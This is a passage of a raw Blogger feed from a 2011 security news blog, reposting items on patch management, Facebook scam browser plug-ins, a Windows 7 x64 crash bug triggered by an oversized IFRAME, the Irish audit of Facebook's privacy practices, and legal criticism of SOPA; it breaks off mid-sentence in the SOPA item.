&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-vu-wL8A3hP4/TvOev28Ov9I/AAAAAAAAACg/TqckbV_TMQM/s1600/rac_allnode.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="http://2.bp.blogspot.com/-vu-wL8A3hP4/TvOev28Ov9I/AAAAAAAAACg/TqckbV_TMQM/s320/rac_allnode.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;


&lt;br /&gt;
Unfortunately, the firm didn’t check the patch as well as it could have and the tweak disabled its firewalls.&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
Patch management looks easy but can cause nightmares if not handled 
properly, says Lewis, who warns that companies should never rely 
completely on automation.&lt;br /&gt;
&lt;br /&gt;

&lt;/div&gt;
“&lt;b&gt;You will always need a human element,&lt;/b&gt;” he says.&lt;br /&gt;
&lt;br /&gt;


The patch management challenge intensifies as the number of 
applications in an enterprise grows. Microsoft’s update service does a 
good job of looking after its own applications, but takes you only so 
far.&lt;br /&gt;


Third-party applications are harder to pinpoint and manage, and they 
represent roughly two-thirds of the problem. In 2010, 69 per cent of the
 sources of vulnerabilities on endpoints were found to have originated 
with third-party programs.&lt;br /&gt;
&lt;br /&gt;


In 2006, patching Microsoft applications and the operating system on 
the average endpoint would have eliminated 55 per cent of 
vulnerabilities. In 2010, it got rid of just 31 per cent.&lt;br /&gt;
&lt;br /&gt;


Take Adobe, for example. The company has suffered from several serious vulnerability exploits over the years, one of which &lt;a href="http://www.adobe.com/support/security/bulletins/apsb11-26.html?PID=4165004" target="_blank"&gt;appeared&lt;/a&gt;
 in September. A zero-day in the Flash player makes it possible for 
attackers to take control of a machine and the firm admitted that it was
 being exploited in the wild.&lt;br /&gt;
&lt;br /&gt;


Adobe’s PDF reader has also had critical vulnerabilities, and fleeing
 to alternatives such as FoxIT’s PDF Reader doesn’t help. It, too, has &lt;a href="http://www.foxitsoftware.com/Secure_PDF_Reader/security_bulletins.php" target="_blank"&gt;suffered&lt;/a&gt; from vulnerability issues.&lt;br /&gt;


&lt;h3&gt;
Fast work&lt;/h3&gt;
In addition to patches that break systems in weird ways, time 
management can also be an issue. In many companies, the window available
 to take down systems for planned maintenance is shrinking, so patches 
must be rolled out faster.&lt;br /&gt;
&lt;br /&gt;


However, Kamel Patel, a UK practice manager at giant IT services 
company Dimension Data, claims the last time he had to install a patch 
on a machine that needed a mandatory reboot was a while back. The move 
to the cloud, he argues, has made patch management easier.&lt;br /&gt;
&lt;br /&gt;


“Some of the issues when you installed a patch and it overrode another file are reduced,” he says.&lt;br /&gt;


Not everyone buys the Utopian idea of patch-free IT departments. “So,
 why did Google and Adobe get nailed using IE 6?” asks Lewis.&lt;br /&gt;
&lt;br /&gt;


Both companies were compromised during 2009 by zero-day attacks that 
exploited Internet Explorer 6 in an onslaught known as Operation Aurora.
 These companies were running a browser a couple of generations older 
than the one currently available.&lt;br /&gt;
&lt;br /&gt;


“&lt;b&gt;Why?&lt;/b&gt;” asks Emerson Tan, founder of PacketStorm, an online community 
that collects vulnerabilities and exploits. “&lt;b&gt;Because nobody has bothered
 to fix their corporate intranets. Upgrading to something with most of 
the flaws fixed will simply break their internal apps.&lt;/b&gt;”&lt;br /&gt;


&lt;h3&gt;
Enveloping cloud&lt;/h3&gt;
Brian Bourne, founder of Sector, a security conference taking place 
in Toronto in October, is equally sceptical that cloud-based apps escape
 patch management issues.&lt;br /&gt;
&lt;br /&gt;


“&lt;b&gt;You have less control because you have to move forward when they say so&lt;/b&gt;,” he says.&lt;br /&gt;
&lt;br /&gt;


Cloud-based application vendors update their software regularly 
without customer input. As an enterprise user, you may be able to stay 
on an earlier revision for a while by negotiating with the vendor, but 
that won’t last forever.&lt;br /&gt;
&lt;br /&gt;


“&lt;b&gt;You might have written something that interfaces with its 
application. Or there may be some feature it removed or altered that you
 were dependent on but which it figured no customers were using&lt;/b&gt;,” says 
Bourne.&lt;br /&gt;
&lt;br /&gt;


Other challenges include the consumerisation of IT, which encourages 
employees and contractors to bring in devices such as tablets and 
smartphones.&lt;br /&gt;
&lt;br /&gt;


Making sure these are adequately patched creates a whole new set of 
problems, landing us in the sticky area of network access control, 
network quarantine and policy servers to manage the whole tangled mess.&lt;br /&gt;


Smaller businesses have an easier time, according to Patel. “&lt;b&gt;It's 
pretty straightforward&lt;/b&gt;,” he says. “Just accept everything from Windows 
Update.”&lt;br /&gt;
&lt;br /&gt;


For many small companies, this will be adequate. But every so often, a
 patch appears that takes down a piece of software. For example, 
Microsoft's recent gaffe, in which it accidentally decided that Google Chrome was a piece of malware, caused problems for many users.&lt;br /&gt;

&lt;blockquote class="pullquote"&gt;


&lt;div style="font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;For many companies the cost of &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;blockquote class="pullquote"&gt;
&lt;div style="font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;setting up a proper test bed may be prohibitive&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/blockquote&gt;
Ideally, customers will test everything before deploying a patch. But
 for many companies the cost of setting up a proper test bed and 
maintaining a configuration management database may be prohibitive, if 
not from a capital expenditure perspective, then simply because they 
don't have the internal nous to get the job done.&lt;br /&gt;


&lt;h3&gt;
Examination fatigue&lt;/h3&gt;
Many companies are settling for a compromise, Patel suggests. Rather 
than testing a patch to death with a variety of different configurations, 
they give it a quick once-over.&lt;br /&gt;
&lt;br /&gt;


“&lt;b&gt;You might try it out on test machines and if after a week users 
 aren’t experiencing problems, you release it to the whole estate&lt;/b&gt;,” he 
says.&lt;br /&gt;
&lt;br /&gt;


Some companies may simply wait for two weeks to see if any adverse 
reactions to new patches turn up elsewhere, and if not, they deploy. It 
all depends on the level of risk that the company is comfortable with.&lt;br /&gt;


Ultimately, any patching strategy involves at least some human 
interaction, but the key lies in minimising fuss by adopting a mature 
approach to IT.&lt;br /&gt;
&lt;br /&gt;


For example, any change management process can be made simpler by 
adopting just one or two images for corporate desktops, rather than 
juggling many desktop builds. Reporting software can also illustrate the
 effects of changes and help ensure that a deployment has succeeded, 
with minimal impact on the infrastructure.&lt;br /&gt;
&lt;br /&gt;


Maintaining the reliability of your systems involves attention to 
detail and a refined approach to change management. Do you have what it 
takes?&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-3420710006379124785?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/lRnolHHpjSI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/3420710006379124785/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/clever-patching-keeps-system.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/3420710006379124785?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/3420710006379124785?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/lRnolHHpjSI/clever-patching-keeps-system.html" title="Clever patching keeps the system serviceable !" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-vu-wL8A3hP4/TvOev28Ov9I/AAAAAAAAACg/TqckbV_TMQM/s72-c/rac_allnode.gif" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/clever-patching-keeps-system.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkcARns-eCp7ImA9WhRXFUU.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-1065193562600271190</id><published>2011-12-22T21:07:00.001Z</published><updated>2011-12-22T21:07:27.550Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-22T21:07:27.550Z</app:edited><title>Facebook scams now spread by dodgy browser plug-ins !!</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/U9auNNxcj0TI_hQfcMUhU1q_ijU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/U9auNNxcj0TI_hQfcMUhU1q_ijU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/U9auNNxcj0TI_hQfcMUhU1q_ijU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/U9auNNxcj0TI_hQfcMUhU1q_ijU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Con men have developed a new approach towards spreading scams on Facebook.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s1600/Facebook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s320/Facebook.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;


Instead of using status updates as a lure, the latest generation of 
Facebook scams attempt to trick marks into installing malicious browser 
extensions. The plug-ins are supposedly needed to view non-existent 
video clips supposedly posted by an earlier victim.&lt;br /&gt;
&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
Once installed, these malign browser ad-ons spread the scam from one user's profile&amp;nbsp;to another's profiles.&lt;br /&gt;

&lt;/div&gt;
Elad Sharf, security researcher at Websense Security Labs, 
explains: “Scam pages typically utilise social engineering tricks such 
as enticing you with videos or a free voucher. In this new scam you’re 
encouraged to install a browser plugin.&lt;br /&gt;
&lt;br /&gt;


"The plugin is an integral part of&amp;nbsp;how the scam is spread and has the
 ability to propagate by posting in your name on friends' pages. As much
 as these offers look tempting, if you’re asked to install plug-ins in 
order to get vouchers or watch a video – remember it could be a trick to
 spread scams, spam and malware.”&lt;br /&gt;
&lt;br /&gt;


The bogus extensions come as add-ons for both Firefox and Chrome. 
More details of the scam, including screenshots, can be found in a blog 
post by Websense &lt;a href="http://community.websense.com/blogs/securitylabs/archive/2011/12/20/facebook-scams-kick-it-up-a-notch-with-firefox-chrome-plugins.aspx?cmpid=pr" target="_blank"&gt;here&lt;/a&gt;. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-1065193562600271190?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/bTx21ZEjzbY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/1065193562600271190/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/facebook-scams-now-spread-by-dodgy.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/1065193562600271190?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/1065193562600271190?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/bTx21ZEjzbY/facebook-scams-now-spread-by-dodgy.html" title="Facebook scams now spread by dodgy browser plug-ins !!" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s72-c/Facebook.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/facebook-scams-now-spread-by-dodgy.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUEBSHY4eyp7ImA9WhRXFU0.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-9174757516910358946</id><published>2011-12-21T21:40:00.001Z</published><updated>2011-12-21T21:40:59.833Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-21T21:40:59.833Z</app:edited><title>A simple HTML tag will crash 64-bit Windows 7</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/7hvXhA96sxwpEsa7wpbM0ta0KK0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/7hvXhA96sxwpEsa7wpbM0ta0KK0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/7hvXhA96sxwpEsa7wpbM0ta0KK0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/7hvXhA96sxwpEsa7wpbM0ta0KK0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-SdVehbPkpkY/TvJSW-TxH0I/AAAAAAAAACU/Jh0dy8Mp2vc/s1600/html.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="228" src="http://3.bp.blogspot.com/-SdVehbPkpkY/TvJSW-TxH0I/AAAAAAAAACU/Jh0dy8Mp2vc/s320/html.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;


The memory corruption bug in x64 Win 7 could also allow malicious 
kernel-level code to be injected into machines, security alert biz 
Secunia &lt;a href="http://secunia.com/advisories/47237" target="_blank"&gt;warns&lt;/a&gt;.
 Fortunately, the 32-bit version of Windows 7 is immune to the flaw, 
which has been pinned down to win32k.sys, the operating system file 
that contains the kernel portion of the Windows user interface and 
related infrastructure.&lt;br /&gt;
&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
Proof-of-concept code showing how to crash vulnerable Win 7 boxes has
 been leaked: the simple HTML script, when opened in Apple's Safari web 
browser, quickly leads to the kernel triggering a page fault in an 
unmapped area of memory, which halts the machine at a blue screen of 
death.&lt;br /&gt;
&lt;br /&gt;

&lt;/div&gt;
The offending script is just an IFRAME tag with an overly large 
height attribute. Although Safari is required to spark the system crash 
via HTML, modern operating systems should not allow usermode 
applications to bring down the machine. Microsoft is now investigating 
the vulnerability, which was first reported by Twitter user &lt;a href="http://twitter.com/w3bd3vil"&gt;w3bd3vil&lt;/a&gt;,
 although the software giant is racing against hackers tracing the code 
execution path to discover the underlying vulnerability in Windows 7.&lt;br /&gt;
&lt;br /&gt;


A video of the Safari-triggered crash along with the HTML PoC can be &lt;a href="http://www.youtube.com/watch?v=u-62ZqrhD2k" target="_blank"&gt;seen here&lt;/a&gt;. Other exploit scenarios might also be possible.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-9174757516910358946?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/uo4j8djikLw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/9174757516910358946/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/simple-html-tag-will-crash-64-bit.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/9174757516910358946?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/9174757516910358946?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/uo4j8djikLw/simple-html-tag-will-crash-64-bit.html" title="A simple HTML tag will crash 64-bit Windows 7" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-SdVehbPkpkY/TvJSW-TxH0I/AAAAAAAAACU/Jh0dy8Mp2vc/s72-c/html.jpg" height="72" width="72" 
/><thr:total>2</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/simple-html-tag-will-crash-64-bit.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUMASHo8eyp7ImA9WhRXFU0.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-8056679580436161583</id><published>2011-12-21T21:37:00.002Z</published><updated>2011-12-21T21:37:29.473Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-21T21:37:29.473Z</app:edited><title>Irish gov - Facebook's 'Darwinian' nature keeps users safe</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/VF3f15c_ue_0i92RvJkh-20Vs80/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/VF3f15c_ue_0i92RvJkh-20Vs80/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/VF3f15c_ue_0i92RvJkh-20Vs80/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/VF3f15c_ue_0i92RvJkh-20Vs80/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Facebook's handling of its user data in Ireland is legitimate, the Irish data protection commissioner's office said today.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s1600/Facebook.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s320/Facebook.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
 &lt;br /&gt;


The DPA released a 149-page audit report detailing the outcome of a 
privacy inspection carried out by the information commission in Ireland.&lt;br /&gt;
&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
“The audit has found a positive approach and commitment on the part 
of Facebook Ireland Ltd to respecting the privacy rights of its users, 
said Irish Data Protection Commissioner Billy Hawkes.&lt;br /&gt;

&lt;/div&gt;
"Arising from the audit, Facebook-Ireland has agreed to a wide range 
of 'best practice' improvements to be implemented over the next 6 
months, with a formal review of progress to take place in July of next 
year,” he added.&lt;br /&gt;
&lt;br /&gt;


His deputy, Gary Davis, led the audit that was announced in 
September, following a number of privacy complaints brought against 
Facebook, whose international headquarters are in Dublin, Ireland, that 
were submitted to the Commission.&lt;br /&gt;
&lt;br /&gt;


An Austria-based collective called Europe versus Facebook filed 22 
complaints with the Irish data protection commissioner. Among other 
things, the group griped about Facebook's "Like" button that – it was 
revealed by Oz blogger Nik Cubrilovic – had carried cookies that 
included unique information after people had logged out of the dominant 
social network.&lt;br /&gt;


At the time, Facebook said it had "quickly" fixed the issue, but insisted there was no privacy or security breach.&lt;br /&gt;
&lt;br /&gt;


As &lt;em&gt;The Register&lt;/em&gt; pointed out in September, Facebook farms all the data it stores back to its spiritual homeland in the US.&lt;br /&gt;
&lt;br /&gt;


But while a privacy audit in Ireland might have appeared significant 
given that the Irish data protection commissioner's office was the 
nearest responsible DPA outside of the firm's US headquarters, the 
reality was that Facebook isn't breaching European law.&lt;br /&gt;
&lt;br /&gt;


Davis, who wants to see "improvements" from Facebook, acknowledged that in the audit document, seen by &lt;em&gt;El Reg&lt;/em&gt;,
 and published later today. The Irish DPA described the dominant social 
network as having "an almost Darwinian nature", which meant it should 
have "robust mechanisms" in place. But the commissioner's office 
indicated today that it wants to see Facebook be at the forefront of 
data privacy online.&lt;br /&gt;
&lt;br /&gt;


"Taking a leadership position that moves from compliance with the law
 to the achievement of best practice is for Facebook Ireland to decide 
but if it continues to display the commitment I witnessed throughout the
 audit process it is certainly achievable,” said Davis. &lt;br /&gt;


The report issued recommendations to Facebook and asked it to 
"commit" to implementing "best practice" across the company's site:&lt;br /&gt;


&lt;blockquote&gt;

&lt;ul&gt;
&lt;li&gt;a mechanism for users to convey an informed choice for how their 
information is used and shared on the site including in relation to 
Third Party Apps;&lt;/li&gt;
&lt;li&gt;a broad update to the Data Use Policy/Privacy Policy to take account
 of recommendations as to where the information provided to users could 
be further improved;&lt;/li&gt;
&lt;li&gt;transparency and control for users via the provision of all personal
 data held to them on request and as part of their everyday interaction 
with the site;&lt;/li&gt;
&lt;li&gt;the deletion of information held on users and non-users via what are
 known as social plugins and more generally the deletion of data held 
from user interactions with the site much sooner than presently;&lt;/li&gt;
&lt;li&gt;increased transparency and controls for the use of personal data for advertising purposes;&lt;/li&gt;
&lt;li&gt;an additional form of notification for users in relation to facial 
recognition/”tag suggest” that is considered will ensure Facebook 
Ireland is meeting best practice in this area from an Irish law 
perspective; an enhanced ability for users to control tagging and posting
 on other user profiles;&lt;/li&gt;
&lt;li&gt;an enhanced ability for users to control whether their addition to Groups by friends; and&lt;/li&gt;
&lt;li&gt;the Compliance management/Governance function in Dublin which will 
be further improved and enhanced to ensure that the introduction of new 
products or new uses of user data take full account of Irish data 
protection law.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
Facebook is expected to implement those commitments over the next six
 months, said the Irish DPA. An agreed "formal review" will be undertaken 
by the commissioner's office in July next year. However, there are 
various examples throughout the audit report of Facebook batting back 
recommendations from the watchdog.&lt;br /&gt;


On the contentious issue of photo-tagging, Facebook simply said it 
would "examine the broader implications" of the issue during the July 
2012 review.&lt;br /&gt;


The social network added in the report: "Facebook firmly believes 
that it has struck the right balance in terms of product development and
 user control" when it comes to use of its facial recognition tech.&lt;br /&gt;


On the issue of individual users having their profile pictures and 
names displayed in third-party ads, Facebook said it would "enter into 
discussions" with the commission "in advance of any plans to introduce 
such functionality."&lt;br /&gt;


The Irish data regulator had asked Facebook to consider gaining consent from its users before implementing such a feature.&lt;br /&gt;


Facebook EMEA policy wonk Richard Allan said: "Facebook has committed
 to either implement, or to consider, other 'best practice' improvements
 recommended by the commission, even in situations where our practices 
already comply with legal requirements. Meeting these commitments will 
require intense work over the next six months."&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-8056679580436161583?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/XbcOH4J86z0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/8056679580436161583/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/irish-gov-facebooks-darwinian-nature.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/8056679580436161583?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/8056679580436161583?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/XbcOH4J86z0/irish-gov-facebooks-darwinian-nature.html" title="Irish gov - Facebook's 'Darwinian' nature keeps users safe" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-m1tpD8Doo5Y/Tt-57iHaY6I/AAAAAAAAABI/RlAlmOQiOWA/s72-c/Facebook.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/irish-gov-facebooks-darwinian-nature.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;C0UCSH4ycSp7ImA9WhRXFE4.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-6502808167874891386</id><published>2011-12-21T01:34:00.002Z</published><updated>2011-12-21T01:34:29.099Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-21T01:34:29.099Z</app:edited><title>US constitution - legal eagles, Anti-piracy laws will smash internet</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/HYGGcd5ygew820B96NOVrG99_Nk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/HYGGcd5ygew820B96NOVrG99_Nk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/HYGGcd5ygew820B96NOVrG99_Nk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/HYGGcd5ygew820B96NOVrG99_Nk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div id="body"&gt;

Legal experts in the US have said that the Stop Online Piracy Act (SOPA) and the proposed PROTECT IP legislation will damage the world's DNS system.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vUefNflBkTM/TvE2rO2GryI/AAAAAAAAACM/E8RQvVPqieY/s1600/piracy_is_a_crime_-_unskippable_anti-piracy_track.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="171" src="http://3.bp.blogspot.com/-vUefNflBkTM/TvE2rO2GryI/AAAAAAAAACM/E8RQvVPqieY/s320/piracy_is_a_crime_-_unskippable_anti-piracy_track.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Legal experts are warning that the proposed PROTECT IP and the Stop 
Online Piracy Act (SOPA) legislation, currently working their way 
through Congress, will damage the world's DNS system, cripple attempts 
to get better online security and violate free speech rights in the US 
constitution.&lt;br /&gt;
 &lt;br /&gt;


&lt;a href="http://www.stanfordlawreview.org/online/dont-break-internet" target="_blank"&gt;In an essay&lt;/a&gt;
 published in the Stanford Law Review professors Mark Lemley, David 
Levine and David Post warned that the overarching reach of the 
legislation would cause people to seek alternatives to the existing DNS 
system, manufacture massive technical problems in the implementation of 
DNSSEC and trample over rights of free expression by allowing the total 
suppression of published opinion based on allegations without proof, or 
even a hearing.&lt;br /&gt;
&lt;br /&gt;


&lt;div id="article-mpu-container"&gt;

&lt;div class="ad-now" id="ad-mpu1-spot" style="height: auto; width: auto;"&gt;



&lt;/div&gt;
“These bills, and the enforcement philosophy that underlies them, 
represent a dramatic retreat from this country’s tradition of leadership
 in supporting the free exchange of information and ideas on the 
internet,” the trio warn.&lt;br /&gt;
&lt;br /&gt;

&lt;/div&gt;
Under the terms of the proposed PROTECT IP legislation a US federal 
prosecutor who finds a foreign website that is “dedicated to infringing 
activities” can force all US internet service providers, domain name 
registries, domain name registrars and operators of domain name servers 
to block either the offending page or the whole web domain from the DNS 
system* - effectively wiping the site off the internet map.&lt;br /&gt;


The professors warn that the SOPA legislation is even worse in this 
regard. “Under SOPA, IP rights holders can proceed vigilante-style 
against allegedly offending sites, without any court hearing or any 
judicial intervention or oversight whatsoever… and all of this occurs 
